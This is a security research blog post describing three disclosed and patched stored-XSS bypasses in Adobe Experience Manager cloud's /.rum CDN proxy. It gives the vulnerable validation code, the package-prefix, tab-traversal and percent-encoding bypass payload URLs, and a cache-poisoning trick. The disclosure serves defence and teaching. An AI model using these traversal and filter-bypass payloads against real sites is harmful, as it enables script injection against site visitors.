How we got persistent XSS on every AEM cloud site, thrice

July 1, 2025

Adobe Experience Manager is marketed as an ‘enterprise-grade’ CMS and is one of the most popular CMSes among large companies. If you visit the landing page of a large corporate site, chances are it is running AEM under the hood. AEM started as a standalone, self-hosted application, but in recent years Adobe has been pushing its cloud offering, which comes with built-in CDN and security features.

While doing bug bounty work on a site running AEM, we noticed that the site was loading some JavaScript from the route `/.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js`. Further digging indicated that the `/.rum` path was handled by Adobe’s cloud-specific CDN configuration, and appeared to be proxying directly to an NPM package host. Our interest was piqued, as NPM packages can contain HTML files that may allow for an XSS.

This blog post recounts the story of how we were able to exploit this proxy to achieve a stored XSS on every AEM cloud site not once, not twice, but three times, along with a little-known technique we used along the way that you may be able to apply in your own research.

Setting the Stage

RUM stands for ‘real user monitoring’ and is a standard way of tracking users’ experience with an AEM cloud site. RUM tracks mouse movements, page load times, and other useful metrics for a certain sample set of users and collects them at the `/.rum` endpoint. The data collected is well documented in Adobe’s page on Operational Telemetry.

The `/.rum` path does not touch the AEM application at all; it is handled by a JavaScript worker within the `fastly@edge` platform, which Adobe leverages for its CDN features. Luckily for us, the source code of the RUM collector is freely available on GitHub in the `helix-rum-collector` repository.

After reviewing the code, we understood that the `/.rum` proxy roughly worked as follows:

  • First, the code would check that the path started with either `/.rum/web-vitals` or `/.rum/@adobe/helix-rum`, and if not, would abort with an error. This is intended to allow access to only three packages: `web-vitals`, `@adobe/helix-rum-js`, and `@adobe/helix-rum-enhancer`.
  • Then, the code would randomly choose between JSDelivr and Unpkg, two CDNs that both host NPM packages.
  • The code would then strip the `/.rum` prefix from the path and use `fetch` to retrieve the content from the chosen CDN, proxying all the response headers back.
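Put together, the flow looks roughly like this (a minimal sketch based on our reading of the code; the names are ours, not Adobe's):

// Minimal sketch of the proxy flow described above (assumed names)
async function handleRum(req) {
  const { pathname } = new URL(req.url);
  // Whitelist check: only the allowed package prefixes pass
  if (!pathname.startsWith('/.rum/web-vitals')
      && !pathname.startsWith('/.rum/@adobe/helix-rum')) {
    return new Response('Invalid path', { status: 400 });
  }
  // Pick one of the two NPM CDNs at random
  const base = Math.random() < 0.5
    ? 'https://unpkg.com'
    : 'https://cdn.jsdelivr.net/npm';
  // Strip the /.rum prefix and fetch from the chosen CDN
  const beresp = await fetch(base + pathname.replace(/^\/\.rum/, ''));
  // Proxy the body and all response headers (including Content-Type) back
  return new Response(beresp.body, {
    status: beresp.status,
    headers: beresp.headers,
  });
}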

Since the code proxies all headers, including the `Content-Type`, the first thing to check before even thinking about mounting an XSS attack was whether either NPM package CDN allows serving files with a scriptable MIME type. We started with the most obvious approach: publishing a package containing an HTML file. While JSDelivr served this file as `text/plain`, Unpkg happily served it as `text/html` and executed our `alert`.
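The difference is easy to reproduce; a quick probe (with a hypothetical package and file name) looks something like this:

// Compare the Content-Type each CDN serves for the same HTML file.
// 'some-package/demo.html' is a placeholder; substitute any package
// that ships an HTML file.
for (const base of ['https://unpkg.com', 'https://cdn.jsdelivr.net/npm']) {
  const resp = await fetch(`${base}/some-package/demo.html`);
  console.log(base, '->', resp.headers.get('content-type'));
}
// Unpkg answers with text/html (scriptable); JSDelivr with text/plain.

Having determined that serving a malicious XSS payload was at least possible in theory, our attention turned to attacking the logic used to whitelist packages in the proxy.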

First Blood

Both NPM CDNs in use share the same underlying path structure for accessing files: `/package/filepath` for standalone NPM packages, and `/@organisation/package/filepath` for packages under an organisation. Under this scheme, checking the prefix of the path being proxied seems like a strong protection. However, we began to look closer at the exact checks being done on the path, which read as follows:

  const { pathname } = new URL(req.url);

  // Reject double-encoded URLs (which contain %25 as that is the percent sign)
  // Also reject paths that contain '..' but decode the URL first as it might be encoded
  if (pathname.includes('%25') || decodeURI(pathname).includes('..')
    || pathname.includes('%3A') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

  try {
    // .. snip ..

    const isDirList = (pathname.endsWith('/'));
    if (req.method === 'GET' && pathname.startsWith('/.rum/web-vitals')) {
      if (isDirList) {
        return respondError('Directory listing is not allowed', 404, undefined, req);
      }
      return respondPackage(req);
    }
    if (req.method === 'GET' && pathname.startsWith('/.rum/@adobe/helix-rum')) {
      if (isDirList) {
        return respondError('Directory listing is not allowed', 404, undefined, req);
      }
      return respondPackage(req);
    }
  } // .. snip: catch block elided ..

Clearly some thought has been put into security here. By checking for `..` in the decoded URI, the code kills any trivial traversal-based bypass like `/.rum/web-vitals/%2E%2E/our-package/x.html`. However, the code has a quite funny and simple bypass that allows us to proxy to our own package; can you see it?

The check `pathname.startsWith('/.rum/web-vitals')` is missing a trailing slash, meaning that the proxy allows packages like `web-vitals-malicious`! Seeing this, we blessed the world with the `web-vitalsxyz` package, which contains a single file `demo.html` with an XSS payload. Visiting `https://our.target.site/.rum/web-vitalsxyz/demo.html` then popped our payload, and we had achieved XSS on every AEM cloud website! With over 45,000 sites running on AEM cloud, the impact of this simple bug was incredibly widespread.
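The bug is easy to demonstrate in isolation:

// Without a trailing slash, any package name that merely begins with
// "web-vitals" satisfies the prefix check:
'/.rum/web-vitals/x.js'.startsWith('/.rum/web-vitals');         // true (intended)
'/.rum/web-vitalsxyz/demo.html'.startsWith('/.rum/web-vitals'); // true (oops)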

Because the proxy distributes requests between JSDelivr and Unpkg at random, at first we thought the XSS would only have a 50% chance of working on any given page load. However, it turns out the CDN responses are cached with a long expiry, so once a single request is served by Unpkg and fires the XSS, that URL will fire the XSS 100% of the time. To prevent the cache server from storing the benign JSDelivr response, we took advantage of the fact that Unpkg (but not JSDelivr) resolves file paths case-insensitively. We therefore modified our payload to `https://our.target.site/.rum/web-vitalsxyz/DEMO.html`, which does the following:

  • If JSDelivr responds, it will fail to find the file and result in a 404; this will not be cached.
  • If Unpkg responds, due to the case insensitive file behavior it will find the file and result in a 200; the response will be cached.
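Assuming the case-insensitive behavior described above, a quick probe against both CDNs shows the asymmetry (the file path is illustrative, and the statuses are what we observed at the time):

// web-vitals ships package.json; request it with the wrong case.
const urls = [
  'https://unpkg.com/web-vitals/PACKAGE.json',            // 200: case-insensitive
  'https://cdn.jsdelivr.net/npm/web-vitals/PACKAGE.json', // 404: case-sensitive
];
for (const url of urls) {
  console.log(url, '->', (await fetch(url)).status);
}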

We reported the bug to Adobe and called it a day.

Second Blood

We woke up five days later to the news that the XSS had been fixed, and indeed, testing our payload on a few sites, it no longer appeared to work. Browsing the repo, we quickly found the pull request that fixed the bug. The diff was as follows:

-   if (req.method === 'GET' && pathname.startsWith('/.rum/web-vitals')) {
+   if (req.method === 'GET' && pathname.match(/^\/\.rum\/web-vitals[@/]/)) {

The code now appears secure. The regex match ensures that `web-vitals` is followed by either a `/`, or an `@` used to specify a version (such as `web-vitals@1.0.0`). It’s natural to ask at this point whether an NPM package name can contain the `@` symbol; we asked this question too, but alas, it is not an allowed character. We seemed to be at a dead end. There is no similar check added for the `/.rum/@adobe/helix-rum` path, but of course we are not members of the `@adobe` organisation, so we cannot publish packages under that namespace.
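A quick check confirms the fix closes our first bug while keeping legitimate paths working:

const check = /^\/\.rum\/web-vitals[@/]/;
check.test('/.rum/web-vitalsxyz/demo.html'); // false: our package is rejected
check.test('/.rum/web-vitals@2.0.0/x.js');   // true: versioned paths still pass
check.test('/.rum/web-vitals/x.js');         // true: unversioned paths still pass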

At this point, we were forced to look at other parts of the code to see whether anything else was exploitable. We turned to the code actually responsible for fetching the file from Unpkg, which looked like this:

const redirectHeaders = [301, 302, 307, 308];
const rangeChars = ['^', '~'];

export async function respondUnpkg(req) {
  const url = new URL(req.url);
  const paths = url.pathname.split('/');
  const beurl = new URL(paths.slice(2).join('/'), 'https://unpkg.com');
  const bereq = new Request(beurl.href);
  const beresp = await fetch(bereq, {
    backend: 'unpkg.com',
  });

  // .. snip .. (ccMap and other setup elided)

  if (redirectHeaders.includes(beresp.status)) {
    const bereq2 = new Request(new URL(beresp.headers.get('location'), 'https://unpkg.com'));
    const err2 = prohibitDirectoryRequest(bereq2);
    if (err2) {
      return cleanupResponse(err2);
    }
    const beresp2 = await fetch(bereq2, {
      backend: 'unpkg.com',
    });

    if (redirectHeaders.includes(beresp2.status)) {
      const bereq3 = new Request(new URL(beresp2.headers.get('location'), 'https://unpkg.com'));
      const err3 = prohibitDirectoryRequest(bereq3);
      if (err3) {
        return cleanupResponse(err3);
      }

      const beresp3 = await fetch(bereq3, {
        backend: 'unpkg.com',
      });

      return cleanupResponse(beresp3, req, ccMap);
    }
    return cleanupResponse(beresp2, req, ccMap);
  }
  return cleanupResponse(beresp, req, ccMap);
}

The code implements a primitive redirect-following system, where it will follow redirects from the CDN up to two times. If you are familiar with web development, this code might seem strange, as `fetch` follows redirects by default and the `backend` parameter is part of neither Node.js nor the web standard. However, you have to remember that this is running in a Fastly edge worker, which has a nonstandard `backend` option, and whose `fetch` function does not follow redirects by default.

This redirect-following behavior gives us a lot of options that we would not have otherwise; there are many ways to coerce Unpkg into giving us a redirect. For example, if we visit an Unpkg URL without a version specified, it will URL-decode the path once and redirect to the same package with the version pinned to the latest available. We can verify this via curl:

sh$ curl 'https://unpkg.com/web-vitals/foo-%2562ar' -v
* Request completely sent off
< HTTP/2 302 
< date: Mon, 30 Jun 2025 00:45:49 GMT
< content-type: text/plain;charset=UTF-8
< content-length: 42
< location: /web-vitals@5.0.3/foo-%62ar
< access-control-allow-origin: *
< cache-control: public, max-age=60, s-maxage=300
< cross-origin-resource-policy: cross-origin
< strict-transport-security: max-age=31536000; includeSubDomains; preload
< x-content-type-options: nosniff
< server: cloudflare
< cf-ray: 9579a49f69d229b3-MEL
< alt-svc: h3=":443"; ma=86400

In our case, it redirects `/web-vitals/foo-%2562ar` to `/web-vitals@5.0.3/foo-%62ar`, which involves adding a version and URL-decoding once. It is natural to ask, then, whether a payload like `/web-vitals/%252e%252e/web-vitalsxyz/demo.html` would work: the redirect happens, the path gets URL-decoded once into `%2e%2e`, and we traverse outside the whitelisted directory. However, the proxy code does include this check:

  // Reject double-encoded URLs (which contain %25 as that is the percent sign)
  // Also reject paths that contain '..' but decode the URL first as it might be encoded
  if (pathname.includes('%25') || decodeURI(pathname).includes('..')
    || pathname.includes('%3A') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

This blocks the `%25` in our double-encoded payload and renders the effort unfruitful.
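In other words, the payload never even reaches Unpkg:

const pathname = '/.rum/web-vitals/%252e%252e/web-vitalsxyz/demo.html';
pathname.includes('%25'); // true: rejected with 'Invalid path' before any fetch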

However, the idea of creating a traversal after a redirect was still interesting to us. After exhausting the obvious approaches, we decided to look at the Node.js source code for the `fetch` function to see how it handles path normalisation. Our idea was that there might be some path that doesn’t contain `..` but still results in a parent traversal. And indeed, after having a look, we found something very interesting in the Ada URL parser library, which Node.js has used since version 18:

template <class result_type>
result_type parse_url_impl(std::string_view user_input,
                           const result_type* base_url) {
  // .. snip ..

  if (unicode::has_tabs_or_newline(user_input)) [[unlikely]] {
    tmp_buffer = user_input;
    // Optimization opportunity: Instead of copying and then pruning, we could
    // just directly build the string from user_input.
    helpers::remove_ascii_tab_or_newline(tmp_buffer);
    url_data = tmp_buffer;
  } else [[likely]] {
    url_data = user_input;
  }

  // .. snip ..
}

ada_really_inline void remove_ascii_tab_or_newline(
    std::string& input) noexcept {
  // if this ever becomes a performance issue, we could use an approach similar
  // to has_tabs_or_newline
  std::erase_if(input, ada::unicode::is_ascii_tab_or_newline);
}

ada_really_inline constexpr bool is_ascii_tab_or_newline(
    const char c) noexcept {
  return c == '\t' || c == '\n' || c == '\r';
}

For those of you who don’t speak C++, what this means is that **any URL passed to `fetch` will have newlines and tabs removed before fetching!** You can verify this for yourself right now: simply type `fetch("https://exam\tple.com/")` into your browser console and observe that it fetches from `example.com`. It turns out this behavior is actually mandated by the WHATWG URL parsing standard, so it is common across most, if not all, URL parsers.
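Combined with the parser's dot-segment normalisation, a tab can smuggle a `..` past any literal check. You can see both behaviors at once with the `URL` constructor:

// The tab is stripped, '.\t.' becomes '..', and the traversal is resolved
// before any request is sent:
new URL('https://unpkg.com/web-vitals@5.0.3/.\t./web-vitalsxyz/DEMO.html').pathname;
// => '/web-vitalsxyz/DEMO.html'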

This allows us to supply the following URL:

https://our.target.site/.rum/web-vitals/.%09./web-vitalsxyz/DEMO.html

What occurs here is as follows:

  • First, the proxy passes this URL to Unpkg minus the `/.rum` prefix; Unpkg sees the package `web-vitals` with the path `/.%09./web-vitalsxyz/DEMO.html`.
  • Since we did not specify a package version, Unpkg URL-decodes the path once and sends a redirect with a `Location` header of `/web-vitals@5.0.3/.\t./web-vitalsxyz/DEMO.html`, where `\t` is a literal tab character.
  • The proxy parses this `Location` header again; per the WHATWG standard it removes the literal tab character, sees that the resulting URL `/web-vitals@5.0.3/../web-vitalsxyz/DEMO.html` contains a path traversal, and normalises it to just `/web-vitalsxyz/DEMO.html`.
  • Fetching this new URL from Unpkg reads from our malicious package and results in XSS.

With this new technique, we once again achieved a universal XSS on all AEM cloud websites, and we reported the new vector to Adobe.

Third Blood

About a week after reporting, we woke up to another pull request and round of fixes, located here. This time, the validation logic had been changed to reject encoded characters with the exception of `%5e`:

-  // Reject double-encoded URLs (which contain %25 as that is the percent sign)
-  // Also reject paths that contain '..' but decode the URL first as it might be encoded
-  if (pathname.includes('%25') || decodeURI(pathname).includes('..')
-    || pathname.includes('%3A') || decodeURI(pathname).includes(':')) {
+  // Reject all encoded characters except %5E (^) when used for semantic versioning
+  // i.e. allow patterns like @package@%5E2.0.0 but reject any other % encoding
+  const validVersionPattern = /%5[Ee](?:\d|$)/;
+  const hasInvalidEncoding = pathname.includes('%')
+    && !pathname.split('/').every((segment) => !segment.includes('%') || validVersionPattern.test(segment));
+
+  if (hasInvalidEncoding || decodeURI(pathname).includes('..') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

… or at least, that seemed to be the intent of the commit. Looking at it more closely, the logic specifies that for any particular segment (delimited by `/`), if it contains a `%`, it must also match the `%5e` version pattern. This has the side effect of allowing any encoded character in a segment, as long as that segment also contains a `%5e` (followed by a digit or at the end).

This is pretty simple to bypass, and we came up with the following payload:

https://our.target.site/.rum/web-vitals/.%09.%2fweb-vitalsxyz%2fDEMO.html%3f%5e

This satisfies all the requirements of the check, as the segment `.%09.%2fweb-vitalsxyz%2fDEMO.html%3f%5e` contains `%5e`. When decoded, however, the `%3f%5e` simply becomes `?^`, a query string that is ignored, while the rest of the segment decodes into the same tab-based traversal as before.
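We can verify that the payload slips through the patched check:

const validVersionPattern = /%5[Ee](?:\d|$)/;
const pathname = '/.rum/web-vitals/.%09.%2fweb-vitalsxyz%2fDEMO.html%3f%5e';
const hasInvalidEncoding = pathname.includes('%')
  && !pathname.split('/').every(
    (segment) => !segment.includes('%') || validVersionPattern.test(segment),
  );
console.log(hasInvalidEncoding); // false: the trailing %5e vouches for the segment
// After one decode at Unpkg, the segment becomes '.\t./web-vitalsxyz/DEMO.html?^',
// i.e. the same tab traversal as before, with '?^' as an ignored query string.

After validating this XSS, we reported this third and final bypass to Adobe.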

The End

The three vulnerabilities were grouped into two assigned CVEs, CVE-2025-47114 and CVE-2025-47115. No action is required from customers; the fixes were applied for all of Adobe’s cloud customers. The validation logic as of today looks as follows:

  // Reject all encoded characters except %5E (^) when used for semantic versioning
  // i.e. allow patterns like @package@%5E2.0.0 but reject any other % encoding
  const validVersionPattern = /%5[Ee](?:\d|$)/;

  const hasInvalidEncoding = pathname.includes('%')
    && !pathname
      .split('/')
      .every((segment) => !segment.includes('%')
        || (segment.match(/%/g).length === 1 // exactly one % sign is allowed
          && validVersionPattern.test(segment))); // and only if it's the ^ character

  if (hasInvalidEncoding || decodeURI(pathname).includes('..') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

This enforces that each URL segment contains at most one percent-encoded character, and that it must be `%5e`. This is incredibly effective and killed every idea we had.
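For instance, our third payload now dies on the single-`%` rule:

// The offending segment contains four % signs, so the new
// segment.match(/%/g).length === 1 condition fails and the request is rejected:
'.%09.%2fweb-vitalsxyz%2fDEMO.html%3f%5e'.match(/%/g).length; // 4

We were not able to find any further bypasses, but if you can find one, you too can have an XSS on all of AEM cloud! =)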

Applications today are increasingly complicated. Usually it’s not just the application itself being hosted on a domain, but layers upon layers of proxies, caching, CDNs, and other features too. These extras are convenient for developers but open up a huge attack surface that is often overlooked. This is not the first, nor will it be the last, vulnerability caused by the CDN layer.

Timeline

  • Apr 25 2025: Reported the first XSS to Adobe.
  • Apr 30 2025: First XSS fixed by Adobe.
  • May 15 2025: Reported the second XSS to Adobe.
  • May 22 2025: Second XSS fixed by Adobe.
  • May 23 2025: Reported the third XSS to Adobe.
  • Jun 10 2025: Third XSS fixed by Adobe.

About Assetnote

Searchlight Cyber’s ASM solution, Assetnote, provides industry-leading attack surface management and adversarial exposure validation, helping organizations identify and remediate security vulnerabilities before they can be exploited. Customers receive security alerts and recommended mitigations simultaneously with any disclosures made to third-party vendors. Visit our attack surface management page to learn more about our platform and the research we do.
